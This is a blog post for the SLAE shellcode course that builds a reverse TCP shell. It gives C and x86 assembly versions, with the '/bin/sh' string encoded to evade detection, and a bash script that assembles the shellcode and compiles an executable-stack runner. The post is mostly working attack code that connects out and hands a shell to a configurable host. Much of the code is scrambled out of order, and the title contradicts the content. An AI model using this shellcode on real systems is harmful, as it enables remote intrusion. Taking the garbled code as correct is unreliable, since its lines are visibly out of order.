2. Linux Shell Bind TCP Shellcode

The exam at Securitytube Linux Assembly Expert course consists of creating or analyzing shellcodes. This is the second assignment, where I have to create a shell reverse TCP shellcode, where the port and IP is configurable.

For github files, check https://github.com/Z6543/My_SLAE/tree/master/02_reverse_tcp_shell

A simple C solution for this reverse shell TCP could be:

main(int argc, char **argv)
{

    struct sockaddr_in server;
int sock;

    int sockaddr_len = sizeof(struct sockaddr_in);
char *arguments[] = { '/bin/sh', 0 };
 

    server.sin_family = AF_INET;
sock = socket(AF_INET, SOCK_STREAM, 0);
 
    server.sin_port = htons(4444);

    connect(sock, (struct sockaddr *)&server, sockaddr_len);
server.sin_addr.s_addr = inet_addr('127.0.0.1');
             
     
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
 

}
execve(arguments[0], &arguments[0], NULL);

         

And the Assembly code for this can be the following one. The /bin/sh string is encoded in the shellcode to evade detection:

global _start

section .text
global _start

xor ebx,ebx  ;clear registers
_start:
 
xor eax,eax

mov byte al,0x66  ;syscall for socket()

push ebx   ;push 0 as first arg
inc ebx   ;ebx to 1

push byte 0x2   ;push 0x2 as third arg
push ebx  ;push 1 as second arg

int 0x80   ;socket syscall
mov ecx, esp   ;save argument list to ecx
 
xchg ebx,eax  ;swap ebx eax
 

  mov BYTE al, 0x3F  
push byte 0x2
pop ecx   ;pop 0x2 into ecx, counter
 
my_loop:

  jns my_loop      
int 0x80          ;syscall 
  dec ecx            ;decrease counter
 

push word 2   ;2 for AF_INET
push 0x0100007f   ;push first argument = IP
push word 0xbabe ;push TCP port

push ecx    ;(struct sockaddr *)&server           
mov ecx,esp   ;save argument list on stack
 
 
push byte 0x10   ;sockaddr_len

mov al,102   ;socket call               
push ebx     ;socket descriptor              
mov ecx,esp   ;save argument list to ecx
int 0x80   ;syscall
 
 

mov esi, 0x4c47411d
xor eax,eax  ;clear
push eax
 
mov esi, 0x46510d0d
add esi, 0x22222222     ;push 0x68732f2f ;"sh//"
mov dword [esp-4], esi


mov ebx,esp  ;filename
add esi, 0x22222112     ;push 0x6e69622f ;"nib/"
mov dword [esp-8], esi
sub esp, 8              ;align esp 
 
 
push eax
mov ecx,esp  ;envp[]
 
push ebx


mov edx,esp  ;filename string terminator, edx is 00
 
mov al,11

int 0x80

Now that our shellcode is ready, let's wrap this with following nice script. It creates the elf file from the nasm source file, links it to an object file, dumps the shellcode with objdump, creates a new C file including the new shellcode, and compiles it. The nasm source code is modified on-the-file to include the correct port number. Change back the modified port number to 0xbabe and IP to 0x0100007f  if you want to change port or IP number again.

#!/bin/bash

echo 'Usage: ./all_compile.sh source_file IP portnumber. E.g. ./all_compile.sh reverse 127.0.0.1 12345 where reverse.nasm is the source file'
function atoi
{
 #Returns the integer representation of an IP arg, passed in ascii dotted-decimal notation (x.x.x.x)
 IP=$1; IPNUM=0

res=$(atoi $2)
for (( i=0 ; i<4 ; ++i )); do
  ((IPNUM+=${IP%%.*}*$((256**$((3-${i}))))))
  IP=${IP#*.}
 done
 echo $IPNUM 
} 

cp $1.nasm $1.nasm_orig


sed s/0x0100007f/0x$ip/ < $1.nasm > $1.nasm_
ip=`printf '%08x\n' $res|sed -r s/\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)\([0-9a-f]{2}\)/\\\4\\\3\\\2\\\1/`
echo IP in reverse hex: $ip

cp $1.nasm_ $1.nasm

port=`printf '%04x\n' $3|sed -r s/\([0-9a-f][0-9a-f]\)\([0-9a-f][0-9a-f]\)/\\\2\\\1/`

echo '[+] Dumping shellcode ...'
echo Port in reverse hex: $port

sed s/0xbabe/0x$port/ < $1.nasm > $1.nasm_
cp $1.nasm_ $1.nasm

cat $1.nasm | grep 'push word 0x'

echo '[+] Assembling with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm

echo '[+] Linking ...'
ld -melf_i386 -o $1 $1.o


echo '' > shellcode.asm

echo -n "\\" >> shellcode.c
for i in `objdump -d $1 | tr '\t' ' ' | tr ' ' '\n' | egrep '^[0-9a-f]{2}$' ` ; do echo -n "\x$i" >> shellcode.asm; done


echo '[+] Creating new shellcode.c ...'

cat > shellcode.c <<EOF
#include<stdio.h>
#include<string.h>
unsigned char code[] ="\\
EOF
cat shellcode.asm >> shellcode.c

cat >> shellcode.c <<EOF
";
main()
{
        printf("Shellcode Length:  %d\n", strlen(code));

echo '[+] Done! Run ./shellcode to execute!'
int (*ret)() = (int(*)())code;
        ret();
}
EOF

echo '[+] Compiling shellcode.c ...'
gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c

Let's test this.

Happy shell! :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student-ID: SLAE - 607